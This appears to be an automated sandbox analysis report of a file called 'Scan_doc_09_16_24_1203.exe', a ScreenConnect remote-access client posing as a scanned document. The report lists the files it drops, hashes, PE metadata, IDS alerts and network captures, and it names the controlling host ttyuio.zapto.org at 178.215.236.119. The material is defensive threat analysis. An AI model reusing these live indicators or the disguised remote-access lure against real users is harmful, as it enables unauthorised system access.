Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsClient.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	601376
Entropy (8bit):	6.185921191564225
Encrypted:	false
SSDEEP:	6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
MD5:	20AB8141D958A58AADE5E78671A719BF
SHA1:	F914925664AB348081DAFE63594A64597FB2FC43
SHA-256:	9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
SHA-512:	C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{<............"...0.................. ... ....@.. .......................`.......x....@.................................=...O.... .................. )...@..........8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................q.......H........H................................................................{D.....{E...V.(F.....}D.....}E......0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...... }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N.....{O.....{P...V.(F.....}O.....}P....0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...... 1.c. )UU.

C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsClient.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsClient.exe.genman

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	2573
Entropy (8bit):	5.026361555169168
Encrypted:	false
SSDEEP:	48:3FYZ8h9o5gI0AsHMrAXQ3MrTMrRGTDBTo:1YiW4AjEvEJ
MD5:	3133DE245D1C278C1C423A5E92AF63B6
SHA1:	D75C7D2F1E6B49A43B2F879F6EF06A00208EB6DC
SHA-256:	61578953C28272D15E8DB5FD1CFFB26E7E16B52ADA7B1B41416232AE340002B7
SHA-512:	B22D4EC1D99FB6668579FA91E70C182BEC27F2E6B4FF36223A018A066D550F4E90AAC3DFFD8C314E0D99B9F67447613CA011F384F693C431A7726CE0665D7647
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.

C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsClient.exe.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10074), with CRLF line terminators
Category:	dropped
Size (bytes):	17866
Entropy (8bit):	5.954687824833028
Encrypted:	false
SSDEEP:	384:ze1oEQwK45aMUf6FX9hJX9FX9R/QPIYM7Y7:zd6FX9hJX9FX9R/QPIN07
MD5:	1DC9DD74A43D10C5F1EAE50D76856F36
SHA1:	E4080B055DD3A290DB546B90BCF6C5593FF34F6D
SHA-256:	291FA1F674BE3CA15CFBAB6F72ED1033B5DD63BCB4AEA7FBC79FDCB6DD97AC0A
SHA-512:	91E8A1A1AEA08E0D3CF20838B92F75FA7A5F5DACA9AEAD5AB7013D267D25D4BF3D291AF2CA0CCE8B73027D9717157C2C915F2060B2262BAC753BBC159055DBDF
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.10.8991" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.10.8991" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" paramet

C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsFileManager.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	81696
Entropy (8bit):	5.862223562830496
Encrypted:	false
SSDEEP:	1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
MD5:	B1799A5A5C0F64E9D61EE4BA465AFE75
SHA1:	7785DA04E98E77FEC7C9E36B8C68864449724D71
SHA-256:	7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
SHA-512:	AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............"...0..@...........^... ...`....@.. .......................`......j.....@..................................^..O....`.. ............... )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....^.(.......;...%...}....:.(......}....:.(......}....:.(......}........0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(........(+...o,...(-...t....

C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsFileManager.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\932a2db58c237abd381d22df4c63a04a_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	87
Entropy (8bit):	3.463057265798253
Encrypted:	false
SSDEEP:	3:/lqlhGXKRjgjkFmURueGvx2VTUz:4DRPAx2Kz
MD5:	D2DED43CE07BFCE4D1C101DFCAA178C8
SHA1:	CE928A1293EA2ACA1AC01B61A344857786AFE509
SHA-256:	8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
SHA-512:	A05486D523556C75FAAEEFE09BB2F8159A111B1B3560142E19048E6E3898A506EE4EA27DD6A4412EE56A7CE7C21E8152B1CDD92804BAF9FAC43973FABE006A2F
Malicious:	false
Preview:	......../...............................Microsoft Enhanced Cryptographic Provider v1.0.

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1590
Entropy (8bit):	5.363907225770245
Encrypted:	false
SSDEEP:	48:MxHKQ71qHGIs0HKEHiYHKGSI6oPtHTHhAHKKkhHNpv:iq+wmj0qECYqGSI6oPtzHeqKkhtpv
MD5:	E88F0E3AD82AC5F6557398EBC137B0DE
SHA1:	20D4BBBE8E219D2D2A0E01DA1F7AD769C3AC84DA
SHA-256:	278AA1D32C89FC4CD991CA18B6E70D3904C57E50192FA6D882959EB16F14E380
SHA-512:	CA6A7AAE873BB300AC17ADE2394232E8C782621E30CA23EBCE8FE65EF2E5905005EFD2840FD9310FBB20D9E9848961FAE2873B3879FCBC58F8A6074337D5802D
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture

C:\Windows\System32\user.config

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	563
Entropy (8bit):	5.039448776106875
Encrypted:	false
SSDEEP:	12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOpvH/vXbAa3xT:2dL9hK6E46YP7vH
MD5:	94F2B125FF2AD83490DCE247338E06CB
SHA1:	30578C28C03869B8325298B547508DDAEC36E5BE
SHA-256:	57736985015312753A6998421628C976A736B9CECBAB5EFF4BD1877055A2C03D
SHA-512:	E6672F868F80EF633B40B591DA32376C52383947C7E1A39A352BD4A737641BC02E66BCF34CB8A06486EFAD202A35BA32348E0D4AC1F482253F8389C4F676F759
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>ttyuio.zapto.org=178.215.236.119-02%2f10%2f2024%2004%3a16%3a42</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465559208019763
Encrypted:	false
SSDEEP:	6144:GIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNQdwBCswSbX:rXD94+WlLZMM6YFH2+X
MD5:	5AB920664351BF0C989D77FD3028B402
SHA1:	70DF1B853BD0733572208477ED9235BCD8203B7B
SHA-256:	B89A196E6C2C2E0C0E1D7484A3F57E6957A3FE199346A235C88382773C466C09
SHA-512:	5D18193EB6DD8DCF9F8E6B8F9F9F67F50E3402DA4D114282B2504386732625607D9685F1E577FCFF85B7F6052FAB4DE148F659F34F3AF00D1C2B4688CF7A1C72
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.D5..................................................................................................................................................................................................................................................................................................................................................".........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.51449814982565
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Scan_doc_09_16_24_1203.exe
File size:	83'368 bytes
MD5:	0753315cbf45a34d4402e7b04a17fddf
SHA1:	5fe769171802694bb13fd3388065c111c8740beb
SHA256:	96cda11b1a4aabf9b2f7695a8b9a87aaa6ff6ae9f2748d89fe7bba2a393703f7
SHA512:	53f33d6aeb2de5d13257e0b858aa455dfb8c48f1598412b50a4e02155629998169d00f8ce62946e826a129f849148ba0ccb0e635012a0fbc0f4e7a4b0387f97c
SSDEEP:	1536:xoG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdaxPBJYYD7UxD2c:renkyfPAwiMq0RqRfbaxZJYYD7c
TLSH:	90835B43B5E18875E9720E3118B1D9B4593FBD110EA48EAF3398426E0F351D19E3AE7B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ycId...d...d.......n...............\|.......A.......v.......v...m`..a...d...........e.......e.......e...Richd...........PE..L..

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x401489
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x66BBDDB2 [Tue Aug 13 22:26:58 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	37d5c89163970dd3cc69230538a1b72b

Authenticode Signature

Signature Valid:	true
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	17/08/2022 01:00:00 16/08/2025 00:59:59
Subject Chain	CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
Version:	3
Thumbprint MD5:	AAE704EC2810686C3BF7704E660AFB5D
Thumbprint SHA-1:	4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Thumbprint SHA-256:	82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
Serial:	0B9360051BCCF66642998998D5BA97CE

Entrypoint Preview

Instruction
call 00007F1710C4107Ah
jmp 00007F1710C40B2Fh
push ebp
mov ebp, esp
push 00000000h
call dword ptr [0040B048h]
push dword ptr [ebp+08h]
call dword ptr [0040B044h]
push C0000409h
call dword ptr [0040B04Ch]
push eax
call dword ptr [0040B050h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [0040B054h]
test eax, eax
je 00007F1710C40CB7h
push 00000002h
pop ecx
int 29h
mov dword ptr [004118C0h], eax
mov dword ptr [004118BCh], ecx
mov dword ptr [004118B8h], edx
mov dword ptr [004118B4h], ebx
mov dword ptr [004118B0h], esi
mov dword ptr [004118ACh], edi
mov word ptr [004118D8h], ss
mov word ptr [004118CCh], cs
mov word ptr [004118A8h], ds
mov word ptr [004118A4h], es
mov word ptr [004118A0h], fs
mov word ptr [0041189Ch], gs
pushfd
pop dword ptr [004118D0h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [004118C4h], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [004118C8h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [004118D4h], eax
mov eax, dword ptr [ebp-00000324h]
mov dword ptr [00411810h], 00010001h

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1060c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x13000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x11800	0x2da8
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x14000	0xddc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xfe38	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xfd78	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb000	0x13c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9cf8	0x9e00	bae4521030709e187bdbe8a34d7bf731	False	0.6035650712025317	data	6.581464957368758	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xb000	0x5d58	0x5e00	ec94ce6ebdbe57640638e0aa31d08896	False	0.4178025265957447	Applesoft BASIC program data, first line number 1	4.843224204192078	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x11000	0x11cc	0x800	04a548a5c04675d08166d3823a6bf61b	False	0.16357421875	data	2.0120795802951505	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x13000	0x1e0	0x200	aa256780346be2e1ee49ac6d69d2faff	False	0.52734375	data	4.703723272345726	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x14000	0xddc	0xe00	908329e10a1923a3c4938a10d44237d9	False	0.7776227678571429	data	6.495696626464028	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x13060	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL

Import

KERNEL32.dll

LocalFree, GetProcAddress, LoadLibraryA, Sleep, LocalAlloc, GetModuleFileNameW, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW, CreateFileW

CRYPT32.dll

CertDeleteCertificateFromStore, CryptMsgGetParam, CertCloseStore, CryptQueryObject, CertAddCertificateContextToStore, CertFindAttribute, CertFreeCertificateContext, CertCreateCertificateContext, CertOpenSystemStoreA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-02T06:16:27.400359+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	178.215.236.119	443	192.168.2.4	49747	TCP
2024-10-02T06:16:28.527421+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	178.215.236.119	443	192.168.2.4	49749	TCP
2024-10-02T06:16:32.632868+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	178.215.236.119	443	192.168.2.4	49753	TCP
2024-10-02T06:16:33.732202+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	178.215.236.119	443	192.168.2.4	49754	TCP
2024-10-02T06:16:35.195398+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	178.215.236.119	443	192.168.2.4	49755	TCP
2024-10-02T06:16:36.308287+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	178.215.236.119	443	192.168.2.4	49758	TCP
2024-10-02T06:16:38.610321+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	178.215.236.119	443	192.168.2.4	49761	TCP
2024-10-02T06:16:40.355840+0200	2009897	ET MALWARE Possible Windows executable sent when remote host claims to send html content	1	178.215.236.119	443	192.168.2.4	49762	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 2, 2024 06:16:19.525217056 CEST	49731	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:19.525263071 CEST	443	49731	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:19.525357008 CEST	49731	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:19.554415941 CEST	49731	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:19.554430008 CEST	443	49731	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:20.193322897 CEST	443	49731	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:20.193459034 CEST	49731	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:20.248465061 CEST	49731	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:20.248492002 CEST	443	49731	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:20.248897076 CEST	443	49731	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:20.308080912 CEST	49731	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:20.685803890 CEST	49731	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:20.727406025 CEST	443	49731	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:20.948609114 CEST	443	49731	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:20.948671103 CEST	443	49731	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:20.948693037 CEST	443	49731	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:20.948713064 CEST	443	49731	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:20.948725939 CEST	49731	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:20.948757887 CEST	443	49731	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:20.948774099 CEST	49731	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:20.948777914 CEST	443	49731	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:20.948798895 CEST	443	49731	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:20.948828936 CEST	49731	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:20.948843956 CEST	443	49731	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:20.948854923 CEST	49731	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:20.991317034 CEST	49731	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:21.038022995 CEST	443	49731	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:21.038034916 CEST	443	49731	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:21.038090944 CEST	443	49731	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:21.038120031 CEST	443	49731	178.215.236.119	192.168.2.4
Oct 2, 2024 06:16:21.038213968 CEST	49731	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:21.038213968 CEST	49731	443	192.168.2.4	178.215.236.119
Oct 2, 2024 06:16:21.038232088 CEST	443	49731	178.215.236.119	192.168.2.4
